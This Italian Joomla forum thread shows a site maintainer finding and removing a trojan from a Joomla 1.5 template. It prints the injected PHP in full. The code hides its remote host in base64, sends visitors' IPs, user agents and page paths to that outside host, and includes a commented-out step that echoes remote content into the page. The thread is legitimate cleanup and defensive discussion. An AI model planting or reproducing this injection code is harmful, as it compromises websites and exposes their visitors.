Joomla.it Forum

Non solo Joomla... => Sicurezza => : Robertinos 29 Apr 2013, 13:20:52

: Script sopra l'head
: Robertinos 29 Apr 2013, 13:20:52

Salve utenti,
ho preso in cura un sito web realizzato con Joomla 1.5.


Appena entro AVG lo blocca! Mi sono accorto che in sopra l'head c'è il seguente codice:

:

Rimosso
 [i]

Credo sia questo il problema vero? Ho scansionato tutti i file ma non l'ho trovato!


Appena lo rimuovo effettuo l'aggiornamento alla 1.5.26...


Qualche suggerimento? :(


Grazie.[/i]

: Re:Script sopra l'head
: mau_develop 29 Apr 2013, 14:16:38

sempre il solito:
http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html

: Re:Script sopra l'head
: Robertinos 29 Apr 2013, 15:39:01

Lo so, ma l'ho preso in gestione già così.


Ho effettuato l'aggiornamento alla 1.5.26, ma ovviamente il problema è rimasto!


Lo script è comunque presente e non riesco a trovare il file che lo contiene.


:(

: Re:Script sopra l'head
: Robertinos 29 Apr 2013, 16:42:18

Ho fatto una scansione dei singoli file presenti nel dominio, ma non vi è nessuna traccia!


Ho fatto anche la stessa scansione nel db, ma niente!


Il file .htaccess è pulito!


Questo il dominio: fulvio frisone . com


Aprendo l'index del template (fatto totalmente da zero dal vecchio webmaster) ho trovato il seguente codice:

:

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics           
        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink );
    }
    }
/*if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle);
    if ($sResult[0]=="O")
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle);
}*/
}

Appena l'ho rimosso è sparito lo script ad inizio pagina!
Posso rimuoverlo tutto, o solo l'ultimo IF?

Grazie.

: Re:Script sopra l'head
: FlowerPower 09 May 2013, 13:13:46

Hai trovato lo stesso trojan che ho trovato anche io nell'index.php del mio template, devi eliminare
da:
 <?php
if (!isset($sRetry))
{.....

a:
   ...curl_close($stCurlHandle);
}
}
?>

ed il trojan sparisce!! Poi segui i suggerimenti che ti hanno indicato.

: Re:Script sopra l'head
: Robertinos 09 May 2013, 13:22:03

Esatto!
Questa è la procedura che ho eseguito.


Grazie.

: Re:Script sopra l'head
: mau_develop 09 May 2013, 13:24:49

per crivere quella roba lì devi avere un buco grande come una casa... se non elimini quello hai voglia a togliere codice

: Re:Script sopra l'head
: Robertinos 09 May 2013, 13:39:26

Con 'quello' ti riferisci al codice nella index del template?